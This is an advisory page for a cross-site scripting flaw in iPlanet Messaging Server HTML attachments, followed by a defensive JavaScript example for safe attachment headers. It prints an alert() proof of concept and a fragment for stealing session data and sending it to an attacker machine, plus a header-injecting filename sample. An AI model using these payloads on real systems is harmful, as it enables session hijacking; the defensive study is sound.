iPlanet Messaging Server 5.0/5.1 – HTML Attachment Cross-Site Scripting

Vulnerability ID 1053894 Vulnerability type
Published 2003-05-27 Updated 2003-05-27
CVE ID N/A
CNNVD-ID N/A
Platform Multiple CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/22662
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/7704/info

It has been reported that iPlanet Messaging Server may be prone to cross-site scripting attacks. The problem is said to occur while processing HTML attachments received via e-mail. If successfully exploited, a malicious HTML file may be used to steal an unsuspecting user's iPlanet Messaging cookies. Other attacks may also be possible.

<html>
<script>alert(document.URL)</script>
</html>

The following script code has been provided to demonstrate indirect session hijacking using web redirection:

function%20steal(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","<URL_to_spoof>",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;

"xmlDoc" can be redirected with an "img src" or "window.open" to the attacker machine.

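A defensive counterpart to the advisory above, added here as an example and not taken from the advisory or from iPlanet: a webmail attachment endpoint can keep HTML attachments from rendering in the mail application's origin by forcing a download and sandboxing the response. The function names and sample attachments are hypothetical, and the advisory itself does not state a fix.

```javascript
// Added example (not iPlanet code): choose response headers for a webmail
// attachment so HTML never renders inside the mail application's origin.

// Types a browser can safely display inline; everything else is downloaded.
const INLINE_SAFE = new Set(["image/png", "image/jpeg", "image/gif", "text/plain"]);

// Extensions that can carry script even when the declared type looks harmless.
const ACTIVE_EXT = /\.(html?|xhtml|shtml|svg|xml|xsl|mht|mhtml)$/i;

// Keep the filename from breaking out of the quoted header value.
function safeFilename(name) {
  const cleaned = String(name || "").replace(/[^A-Za-z0-9._-]/g, "_").slice(0, 100);
  return cleaned || "attachment";
}

// Normalise "Text/HTML; charset=utf-8" to "text/html".
function baseType(declaredType) {
  return String(declaredType || "").split(";")[0].trim().toLowerCase();
}

// Hypothetical helper: returns the headers the attachment endpoint should send.
function attachmentHeaders(filename, declaredType) {
  const type = baseType(declaredType);
  const name = safeFilename(filename);
  const inline = INLINE_SAFE.has(type) && !ACTIVE_EXT.test(name);
  return {
    // Never echo an active type; unknown or active content becomes opaque bytes.
    "Content-Type": inline ? type : "application/octet-stream",
    "Content-Disposition": `${inline ? "inline" : "attachment"}; filename="${name}"`,
    // Stop the browser from sniffing HTML out of a mislabelled body.
    "X-Content-Type-Options": "nosniff",
    // If the body is rendered anyway, the sandbox directive gives it an
    // opaque origin with scripts disabled, so the webmail cookies are out of reach.
    "Content-Security-Policy": "sandbox; default-src 'none'",
  };
}

// Constructed sample attachments, including a mislabelled HTML file and a
// filename that tries to inject a header line.
const samples = [
  ["poc.html", "text/html"],
  ["photo.png", "image/png"],
  ["notes.html", "text/plain"],
  ["a\r\nSet-Cookie: x=1.txt", "text/plain"],
];
for (const [file, type] of samples) {
  console.log(safeFilename(file), "->", attachmentHeaders(file, type)["Content-Disposition"]);
}
```

Marking the session cookie HttpOnly complements these headers, since it keeps the cookie out of reach of script even if an attachment does execute.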